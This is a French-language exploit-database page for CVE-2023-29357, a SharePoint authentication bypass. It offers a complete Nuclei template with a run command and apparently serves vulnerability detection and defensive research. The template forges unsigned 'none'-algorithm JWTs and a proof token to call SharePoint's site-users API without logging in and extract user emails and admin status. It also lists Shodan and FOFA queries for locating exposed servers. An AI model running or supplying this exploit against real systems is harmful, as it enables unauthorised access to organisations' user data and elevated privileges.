Exploit matérialisé
CVE-2023-29357
CRITICAL KEV1 exploit(s) public(s) pour cette CVE, 1 matérialisé(s) avec leur code.
À des fins de recherche défensive uniquement. Ne testez que sur des systèmes que vous possédez ou pour lesquels vous détenez une autorisation écrite. L'accès non autorisé est illégal.
Nuclei
critical Vérifié
Source
Microsoft SharePoint - Authentication Bypass
Par projectdiscovery
Comment tester cet exploit
Le template Nuclei EST le test : une règle de détection exécutable. Installez nuclei, puis lancez-le contre une cible que vous contrôlez.
nuclei -id CVE-2023-29357 -u https://your-target
Template yaml
id: CVE-2023-29357
info:
name: Microsoft SharePoint - Authentication Bypass
author: pdteam
severity: critical
description: |
Microsoft SharePoint Server Elevation of Privilege Vulnerability
impact: |
Unauthenticated attackers can bypass authentication by forging JWT tokens with "none" algorithm to access SharePoint Server APIs, potentially gaining elevated privileges and accessing sensitive documents, user information, and SharePoint site configurations.
remediation: |
Apply Microsoft security patches from MSRC update guide CVE-2023-29357 that properly validates JWT token signatures and prevents authentication bypass in SharePoint Server.
reference:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-29357
- https://srcincite.io/advisories/src-2020-0022/
- https://github.com/Chocapikk/CVE-2023-29357
- https://sec.vnpt.vn/2023/08/phan-tich-cve-2023-29357-microsoft-sharepoint-validatetokenissuer-authentication-bypass-vulnerability/
- https://starlabs.sg/blog/2023/09-sharepoint-pre-auth-rce-chain/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-29357
epss-score: 0.99984
epss-percentile: 0.99982
cpe: cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
vendor: microsoft
product: sharepoint_server
shodan-query:
- http.headers_hash:-1968878704
- cpe:"cpe:2.3:a:microsoft:sharepoint_server"
fofa-query:
- app="Microsoft-SharePoint"
- app="microsoft-sharepoint"
tags: cve,cve2023,microsoft,sharepoint_server,kev,vkev,vuln
variables:
client_id: "00000003-0000-0ff1-ce00-000000000000"
http:
- raw:
- |
GET /_api/web/siteusers HTTP/1.1
Host: {{Hostname}}
Authorization: Bearer
- |
GET /_api/web/siteusers HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Authorization: Bearer {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA
X-PROOF_TOKEN: {{generate_jwt("{\"aud\":\"{{client_id}}@{{realm}}\",\"iss\":\"{{client_id}}\",\"nbf\":1695987703,\"exp\":2011547223,\"ver\":\"hashedprooftoken\",\"nameid\":\"{{client_id}}@{{realm}}\",\"endpointurl\":\"qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=\",\"endpointurlLength\":1,\"isloopback\":true}","none")}}AAA
extractors:
- type: regex
part: header
group: 1
name: realm
regex:
- realm="([^"]*)"
internal: true
- type: json
json:
- .value[].Email
matchers:
- type: word
part: body_2
words:
- LoginName
- Email
- IsSiteAdmin
condition: and
# digest: 4a0a0047304502210090ddc69995ddbf680f624936fa91a704794d6da543d988d7f05680f5994837840220536c709011d96aca994a598126ef861f92e6544fbf9c46bd6c973551d94a5c70:922c64590222798bb761d5b6d8e72950